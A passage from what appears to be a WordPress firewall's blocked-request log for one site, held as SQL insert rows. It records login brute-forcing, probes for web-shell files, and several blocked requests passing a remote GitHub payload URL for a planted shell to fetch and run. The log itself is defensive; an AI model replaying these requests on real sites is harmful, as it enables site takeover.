Firefox\\/47.0\"}','Q6Ik7fX8LmzKcqOwFABGMRNb',0,1665090629.6541,314,'','GET',403,0,700,0,1,'',0),('149.56.226.67',2503533123,'','http://cteisys.com/owa/auth/logon.aspx?replaceCurrent=1&url=http%3A%2F%2Fowa.cteisys.com%2Fowa%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','AeRcfBjNC1li5hdOUQDmvZkt',0,1665090630.3438,309,'','GET',403,0,700,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','onKEBeJzqVN2HxD801FfXtQW',0,1665090691.7313,1200,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','BJsx2pXqVAcC3QiSFyGgK5DP',0,1665090735.8878,1241,'','POST',403,0,600,0,1,'',0),('104.254.90.195',1761499843,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','G4tVbQslcjniu5kforwCYSRP',0,1665091340.9162,1539,'','POST',403,0,515,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','FVBKzPEglSLpcM6HNs0I5ywm',0,1665091807.9627,2426,'','POST',403,0,600,0,1,'',0),('185.189.112.11',3116199947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5Q6ncHC40M2b9A3RKpWqPYry',0,1665092662.5414,2320,'','POST',403,0,515,0,1,'',0),('34.68.76.32',574901280,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','5yumvQsXr7Y8Hkge0BPDWCFR',0,1665093091.4934,11024,'','POST',403,0,600,0,1,'',0),('192.64.82.118',3225440886,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','mUSeYtPQbJwTy9Bi4WrNjzE6',0,1665093135.9338,1214,'','POST',403,0,600,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','XeIE2KOrq7N1kwYxDuTWmapR',0,1665095544.8033,17482,'','POST',403,0,600,0,1,'',0),('209.58.183.78',3510286158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BH6DqRdz3lJXkQp9gstwvmhx',0,1665096674.0676,19567,'','POST',403,0,515,0,1,'',0),('110.40.244.196',1848177860,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','A1Ik7lYDLOgHQB4cyo53htVq',0,1665097930.3282,1287,'','POST',403,0,600,0,1,'',0),('188.166.120.27',3165026331,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','bdyvYfBerOIT2Z0PCE6aqHct',0,1665097973.1389,1347,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','tC8dBXAMZyvxKbiw4cWTD3GN',0,1665099249.9253,17083,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','o4tS7VvyxUf3LC9RXMkOgBIp',0,1665099614.1798,447,'','POST',403,0,600,0,1,'',0),('199.250.223.180',3355107252,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','M2Svzb7QPj4Y0AwcGReOW1Vm',0,1665100380.9286,1205,'','POST',403,0,600,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','RTkSN7GJoHlwm1FxA0ae6W8u',0,1665100427.7953,17035,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','boCMYGyRT8pLhdNvgzZx5Eri',0,1665102233.4413,1193,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','9gGaqhZm4YXxB0LbpclnzuDE',0,1665102869.9912,1237,'','POST',403,0,600,0,1,'',0),('162.144.87.29',2727368477,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','mqab69pgest8w4K1R2HyuiDV',0,1665102915.3928,1250,'','POST',403,0,600,0,1,'',0),('199.249.230.17',3355043345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aAZxzjLtwTJmF0MnlIr6Hk3D',0,1665103069.2436,2754,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4KgewkX3SOEPhW05bRdzBo8x',0,1665104621.1465,19679,'','POST',403,0,515,0,1,'',0),('152.228.208.88',2565132376,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','cEQa52JHULln1B6YjXAfD7by',0,1665105360.6038,17221,'','POST',403,0,600,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','VMuAcD9ZWxnfTptsNQYb2w5q',0,1665105406.5234,1200,'','POST',403,0,600,0,1,'',0),('185.190.142.217',3116273369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','CYTFW3jRXJcpE0IvQPVMmHk9',0,1665107851.4804,17855,'','POST',403,0,600,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','0N3UHlLSZD8Yogd16wABOspk',0,1665107897.6141,1145,'','POST',403,0,600,0,1,'',0),('37.120.132.83',628655187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vOgLpThw7bBDFlE6MQzI4fst',0,1665110033.1951,10641,'','POST',403,0,515,0,1,'',0),('107.167.244.67',1806169155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MRqg5KpymkFJ6hPX1CN08LYS',0,1665110026.0929,17790,'','POST',403,0,515,0,1,'',0),('77.39.212.31',1294455839,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','K84lyxmiJDIjwVBHkzNvYhFA',0,1665110360.3991,6332,'','POST',403,0,600,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','3GW87pDErgKm4SdtiFvXQyIe',0,1665110406.9882,1921,'','POST',403,0,600,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','F5WVgNRHhT3mD1PA0GxnZKO7',0,1665110925.5413,3100,'','POST',403,0,515,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','2jW0eKGoaV43s9FIECQ8tqNv',0,1665112913.0704,1221,'','POST',403,0,600,0,1,'',0),('64.42.179.51',1076540211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ijcg7RXVzMJu9mpsrBTWo3Z4',0,1665112998.9987,2546,'','POST',403,0,515,0,1,'',0),('64.42.179.67',1076540227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','g2F95VNumpfSThJbvXwMQe3G',0,1665113558.8641,19347,'','POST',403,0,515,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','XDxVRU4sLZkC8NBKdibl3Gz1',0,1665115344.4345,19211,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','kcuemyrtdh9AMspfUBXNjPEG',0,1665116519.1267,523,'','POST',403,0,600,0,1,'',0),('107.167.244.83',1806169171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZJHDwYVcPQWy2mIgeEzAjvF6',0,1665116612.3910,18294,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','HgWCcIqYLQX2DlZhrGxnbTea',0,1665116869.3646,1546,'','POST',403,0,600,0,1,'',0),('162.241.60.246',2733718774,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WH79jinUJFm4Zz2adAgkcDpN',0,1665117001.5106,20949,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n57bHxueLPhT4NzksWqrgGAU',0,1665117313.8404,18313,'','POST',403,0,515,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','vNYXGrAsEF5bqTMpQWBOiH1U',0,1665117840.8595,17839,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','NE5MRAVkb6neIY2pzS3uCL0H',0,1665117887.0678,1576,'','POST',403,0,600,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','26lVjmfXSoJsuKeg13MIF4Oq',0,1665117966.4200,18459,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1pXwg9kb2QTSHGfc3AFRhOml',0,1665118299.0899,3623,'','POST',403,0,515,0,1,'',0),('103.130.212.57',1736627257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dm3Ka8GUZ7vFbCYQ6lWMocxS',0,1665118905.3002,18815,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9buUc6T0lgWwFzmtjQrfkniX',0,1665119235.3352,1357,'','POST',403,0,515,0,1,'',0),('81.88.52.223',1364735199,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NkBp28ShXQfmwLgzx1vMiqor',0,1665119517.9186,18389,'','POST',403,0,515,0,1,'',0),('45.14.224.167',755949735,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NYHdjSFwTUgZik8PEQKbf9Oh',0,1665120106.1594,4466,'','POST',403,0,515,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','pG26w3RBgNOLES9YbzcC8AXt',0,1665120311.3740,10967,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','XyLj8RxA1GrFQcONWwnYp3Vo',0,1665120355.1097,1867,'','POST',403,0,600,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cA3g7Ekwd2HBPNGpayl4JD5F',0,1665120389.4741,1608,'','POST',403,0,515,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2SjwADEtWpbZFhJOHrmU5yRN',0,1665120966.3184,18668,'','POST',403,0,515,0,1,'',0),('34.254.111.139',587100043,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','duDxeFIC1Wj98ZQtbgKNyiV0',0,1665121240.5274,18194,'','POST',403,0,515,0,1,'',0),('184.75.221.171',3091979691,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HaL54dKh1SgOZDUNE87eIyPV',0,1665121396.9019,1252,'','POST',403,0,515,0,1,'',0),('103.28.36.205',1729897677,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zOoYfNBwxWKIv0U18aAmXVHi',0,1665121792.5147,18522,'','POST',403,0,515,0,1,'',0),('180.211.99.217',3033752537,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DdtHmSzhYCIrPVxbWo85ZFKp',0,1665122090.6919,7275,'','POST',403,0,515,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WzK4bIHcSLhNvDuB0pRP3dg2',0,1665122378.7769,19161,'','POST',403,0,515,0,1,'',0),('159.89.164.128',2673452160,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','q8ZaJGFNhWOXruYHsAcyil2j',0,1665122725.1691,1830,'','POST',403,0,600,0,1,'',0),('206.189.60.87',3468508247,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','W6GCfey81aImHuwEPJALSX0i',0,1665122769.6299,1324,'','POST',403,0,600,0,1,'',0),('110.40.133.172',1848149420,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ek3stW768AipJorxmz0ISnwK',0,1665122978.9328,18468,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','m89UE3zPdOLwYReNkC5tWf7c',0,1665123631.2651,10336,'','GET',403,0,700,0,1,'',0),('177.222.54.214',2984130262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RX21VUG7udWpcZePT0BMto9C',0,1665123629.8660,18633,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iek35KSOYCdRt2x18ZgnE04Q',0,1665123648.5185,314,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gGA0lKuUpjnibOe8fmLB6JoV',0,1665123653.5882,284,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vQ1GLU8ai0cH4SyKglIjdfAC',0,1665123658.5962,442,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZibyBotNHWv2knPeD6qMaTYz',0,1665123783.6907,5197,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JfTCjk96BAWK5zMXOIb0vUd2',0,1665123791.3519,296,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6c9Pm1GOvflTUeDtsEMo2R5q',0,1665123795.3347,288,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nipazWoMjdm65GlsJr7k3gtC',0,1665123814.5661,295,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hGt7uEFJ3DpxU1BM6PqZgnHQ',0,1665123823.0575,360,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lYofXHc8D0IbsjUuqg7F1kC6',0,1665123835.0929,439,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bO7p2WtV3XoYLh9GwETyv6BU',0,1665123863.0463,509,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bXjLcZUqDG8ftCAEdsp7PugB',0,1665123869.6741,349,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Bbr6HmfqMO9lG7ji5Knpt4uZ',0,1665123874.1611,297,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2tNCTBq9bH56Dn8h07uASYda',0,1665123879.9270,405,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gCwPanLDtTrYBO2fWixqpUKQ',0,1665123885.2873,295,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sghPMjaOUo1WH6tbQKFz9BLm',0,1665123889.4555,309,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MakHyr92nmcX3NP7wiDRSzde',0,1665123897.9147,291,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CwvhFmQRAOjEaZW7LqbI0nU1',0,1665123905.1240,601,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lYThdxGRvIPFBz7HD2UJAbqQ',0,1665123931.0704,2405,'','GET',403,0,700,0,1,'',0),('45.130.83.44',763515692,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','etQ0RHkn3sGTpWcC5SOVbir6',0,1665123938.1034,7295,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CtxRBl1wJH3j0Q8I6LU9Kfan',0,1665123961.0072,329,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 